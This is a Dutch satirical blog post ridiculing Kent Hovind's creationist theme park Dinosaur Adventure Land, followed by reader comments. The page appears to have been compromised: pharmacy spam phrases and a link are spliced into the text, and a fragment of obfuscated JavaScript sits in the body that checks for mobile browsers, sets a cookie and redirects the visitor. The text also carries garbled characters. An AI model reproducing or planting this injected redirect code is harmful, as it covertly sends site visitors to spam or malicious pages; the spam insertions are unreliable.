Een dagje geschiedvervalsing voor de hele familie

We hebben nog wat werkdagen te gaan, maar het is nooit te vroeg om plannen te maken voor het weekeinde. De tip van de week: Dinosaur Adventure Land Cost of lisinopril 10 mg cvs . Toegegeven, je moet er een duur ticket naar Florida voor kopen, maar dan heb je ook wat.

Dinosaur Adventure Land is een creatie van Kent Hovind a.k.a. ai???Dr. Dinoai??i??, de geliefde Amerikaanse Young Earth creationist die zich al jaren bezig houdt met het creatief informeren van kinderen. Hovind weet zeker dat de aarde zoai??i??n 6000 jaar oud is, en heeft daarvoor keihard bewijs. Bovendien beweert de beste man nog nooit in zijn leven een biertje gedronken te hebben. Eerlijker dan Hovind vind je ze niet.

In Dinosaur Adventure Land kunnen kinderen kennis maken met Godai??i??s creaties, en leren over het vredige samenleven van mensen en dinosauriAi??rs. In het ai???creation museumai??i?? ontdekken ze hoe Ai??chte wetenschappers te werk gaan. Geen nonsens over gedegen onderzoek, het testen van theorieAi??n of het kritisch bekijken van resultaten, maar een directe injectie van geloof in het biologieboek. DA?t is de enige echte wetenschappelijke manier.

Wilt u ook dat uw kinderen opgroeien met een verstoord wereldbeeld? Boek dan nu een ticket en kom naar Dinosaur Adventure Land in Pensacola, Florida. Want de waarheid is immers maar saai.

Delivery stromectol http://youth-4-elbe.org/?p=2333 60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Zoon van Robert, kleinzoon van Laurens, kind van andere tijden, meester der luiheid, verleider der vunzigheid, brouwer des ongenoegens. En nog meer van die zotheden.

5 Reacties op “Een dagje geschiedvervalsing voor de hele familie”

  1. Jouw ziel is verloren!

  2. Oh nee Robin, wat nu?!

  3. Creationisten zijn enge mensen. Maar toch mooi om te zien dat zelfs in die kringen het scheppingsverhaal steeds minder waar blijkt. Alleen jammer van al die loze bedreigingen, want Robin, je ziel mag dan wel verloren zijn. Jij hebt tenminste hersenen.

  4. Is het dan nĂ­et waar wat hij zegt?

  5. [...] eerder schreven de Ridders over godsdienstwaanzinnigen die hardnekkig proberen Genesis bij u door de strot naar binnen te duwen. Dat waren echter [...]

Laat een bericht achter